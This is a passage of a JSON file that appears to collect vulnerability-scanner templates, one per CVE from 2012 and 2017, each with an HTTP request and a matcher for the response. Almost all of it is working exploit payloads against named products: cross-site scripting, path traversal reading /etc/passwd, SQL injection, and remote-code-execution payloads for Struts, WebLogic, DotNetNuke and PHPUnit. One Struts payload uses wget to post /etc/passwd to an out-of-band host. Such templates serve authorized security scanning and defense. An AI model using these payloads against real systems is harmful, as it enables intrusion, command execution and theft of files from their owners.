Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4242","info":{"name":"WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4032","info":{"name":"WebsitePanel before v1.2.2.1 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1\nHost: {{Hostname}}\nCookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX=\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\n\nctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-5913","info":{"name":"WordPress Integrator 1.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</sCripT><sCripT>alert(document.domain)</sCripT>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5321","info":{"name":"TikiWiki CMS Groupware v8.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-4878","info":{"name":"FlatnuX CMS - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4253","info":{"name":"MySQLDumper 1.24.4 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0981","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0901","info":{"name":"YouSayToo auto-publishing 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12542","info":{"name":"HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/v1/AccountService/Accounts"],"headers":{"Connection":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["iLO User"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18598","info":{"name":"WordPress Qards - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["console.log"]}]}]},{"id":"CVE-2017-14622","info":{"name":"WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 500","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"2kb-amazon-affiliates-store\")"],"condition":"and"}]}]},{"id":"CVE-2017-11512","info":{"name":"ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini","{{BaseURL}}/fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2017-7615","info":{"name":"MantisBT <=2.30 - Arbitrary Password Reset/Admin Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=","{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11586","info":{"name":"FineCMS <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?s=member&c=login&m=index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nback=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1\n","GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["Refresh:(.*)url=http:\\/\\/interact\\.sh"]}]}]},{"id":"CVE-2017-5638","info":{"name":"Apache Struts 2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd=\"cat /etc/passwd\",#cmds={\"/bin/bash\",\"-c\",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5982","info":{"name":"Kodi 17.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-4011","info":{"name":"McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-14651","info":{"name":"WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Failed to add new collection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-9822","info":{"name":"DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /__ HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nCookie: dnn_IsMobile=False; DNNPersonalization=<profile><item key=\"name1: key1\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type=\"xsd:string\">C:\\Windows\\win.ini</anyType></MethodParameters><ObjectInstance xsi:type=\"FileSystemUtils\"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]","for 16-bit app support"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2017-11165","info":{"name":"DataTaker DT80 dEX 1.50.012 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/getFile.cmd?userfile=config.xml"],"matchers-condition":"and","matchers":[{"type":"word","words":["COMMAND_SERVER","<loggerSettings>","config id=\"config"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3528","info":{"name":"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"],"matchers":[{"type":"word","part":"body","words":["noresize src=\"/\\interact.sh?configName="]}]}]},{"id":"CVE-2017-9805","info":{"name":"Apache Struts2 S2-052 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/struts2-rest-showcase/orders/3","{{BaseURL}}/orders/3"],"body":"<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n        <dataHandler>\n          <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n            <is class=\"javax.crypto.CipherInputStream\">\n              <cipher class=\"javax.crypto.NullCipher\">\n                <initialized>false</initialized>\n                <opmode>0</opmode>\n                <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n                  <iter class=\"javax.imageio.spi.FilterIterator\">\n                    <iter class=\"java.util.Collections$EmptyIterator\"/>\n                    <next class=\"java.lang.ProcessBuilder\">\n                      <command>\n                        <string>wget</string>\n                        <string>--post-file</string>\n                        <string>/etc/passwd</string>\n              <string>{{interactsh-url}}</string>\n                      </command>\n                      <redirectErrorStream>false</redirectErrorStream>\n                    </next>\n                  </iter>\n                  <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>asdasd</name>\n                  </filter>\n                  <next class=\"string\">asdasd</next>\n                </serviceIterator>\n                <lock/>\n              </cipher>\n              <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n              <ibuffer></ibuffer>\n              <done>false</done>\n              <ostart>0</ostart>\n              <ofinish>0</ofinish>\n              <closed>false</closed>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n</map>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["Debugging information","com.thoughtworks.xstream.converters.collections.MapConverter"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-14535","info":{"name":"Trixbox - 2.8.0.4 OS Command Injection","severity":"high"},"requests":[{"raw":["GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\nConnection: close\nCache-Control: max-age=0\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17451","info":{"name":"WordPress Mailster <=1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14524","info":{"name":"OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2017-16877","info":{"name":"Nextjs <2.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-8229","info":{"name":"Amcrest IP Camera Web Management - Data Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/Sha1Account1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DevInformation","SerialID"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5487","info":{"name":"WordPress Core <4.7.1 - Username Enumeration","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/users/","{{BaseURL}}/?rest_route=/wp/v2/users/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"name\":","\"avatar_urls\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"json","name":"usernames","json":[".[] | .slug",".[].name"],"part":"body"}]}]},{"id":"CVE-2017-10271","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soapenv:Envelope\n    xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n    <soapenv:Header>\n        <work:WorkContext\n            xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n            <java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">\n                <void class=\"java.lang.ProcessBuilder\">\n                    <array class=\"java.lang.String\" length=\"3\">\n                        <void index=\"0\">\n                            <string>/bin/bash</string>\n                        </void>\n                        <void index=\"1\">\n                            <string>-c</string>\n                        </void>\n                        <void index=\"2\">\n                            <string>ping -c 1 {{interactsh-url}}</string>\n                        </void>\n                    </array>\n                    <void method=\"start\"/></void>\n            </java>\n        </work:WorkContext>\n    </soapenv:Header>\n    <soapenv:Body/>\n</soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n  <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n      <soapenv:Header>\n          <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n              <java>\n                  <void class=\"java.lang.Thread\" method=\"currentThread\">\n                      <void method=\"getCurrentWork\">\n                          <void method=\"getResponse\">\n                              <void method=\"getServletOutputStream\">\n                                  <void method=\"flush\"/>\n                              </void>\n                              <void method=\"getWriter\"><void method=\"write\"><string>{{randstr}}</string></void></void>\n                          </void>\n                      </void>\n                  </void>\n              </java>\n          </work:WorkContext>\n      </soapenv:Header>\n      <soapenv:Body/>\n</soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex(\"<faultstring>java.lang.ProcessBuilder || <faultstring>0\", body)","contains(interactsh_protocol, \"dns\")","status_code == 500"],"condition":"and"},{"type":"dsl","dsl":["body == \"{{randstr}}\"","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-1000170","info":{"name":"WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"],"body":"dir=%2Fetc%2F&onlyFiles=true","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<li class='file ext_passwd'>","<a rel='/passwd'>passwd</a></li>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9506","info":{"name":"Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-11629","info":{"name":"FineCMS <=5.0.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>p\u4e0d\u5b58\u5728"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000486","info":{"name":"Primetek Primefaces 5.x - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\npfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D\n"],"matchers":[{"type":"word","part":"header","words":["Mogwailabs: CHECKCHECK"]}]}]},{"id":"CVE-2017-15363","info":{"name":"Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<?php","'host'","'database'","'extConf'","'debug'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18024","info":{"name":"AvantFAX 3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=admin&_submit_check=1&jlbqg<script>alert(\"{{randstr}}\")</script>b7g0x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(\"{{randstr}}\")</script>","AvantFAX"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7921","info":{"name":"Hikvision - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<firmwareVersion>"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2017-5631","info":{"name":"KMCIS CaseAware - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000029","info":{"name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/file%3a///etc/passwd/"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11444","info":{"name":"Subrion CMS <4.1.5.10 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["projectdiscovery.io"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17562","info":{"name":"Embedthis GoAhead <3.6.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"endpoint":["admin","apply","non-CA-rev","cgitest","checkCookie","check_user","chn/liveView","cht/liveView","cnswebserver","config","configure/set_link_neg","configure/swports_adjust","eng/liveView","firmware","getCheckCode","get_status","getmac","getparam","guest/Login","home","htmlmgr","index","index/login","jscript","kvm","liveView","login","login.asp","login/login","login/login-page","login_mgr","luci","main","main-cgi","manage/login","menu","mlogin","netbinary","nobody/Captcha","nobody/VerifyCode","normal_userLogin","otgw","page","rulectl","service","set_new_config","sl_webviewer","ssi","status","sysconf","systemutil","t/out","top","unauth","upload","variable","wanstatu","webcm","webmain","webproc","webscr","webviewLogin","webviewLogin_m64","webviewer","welcome"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["environment variable","display library search paths"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9841","info":{"name":"PHPUnit - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6dd70f16549456495373a337e6708865"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14537","info":{"name":"Trixbox 2.8.0 - Path Traversal","severity":"medium"},"requests":[{"raw":["POST /maint/index.php?packages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n\nxajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages\n","GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15944","info":{"name":"Palo Alto Network PAN-OS - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID={{randstr}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@start@Success@end@"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12583","info":{"name":"DokuWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unable to parse at parameter \"<svg onload=alert(document.domain)>\".</div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-0929","info":{"name":"DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request 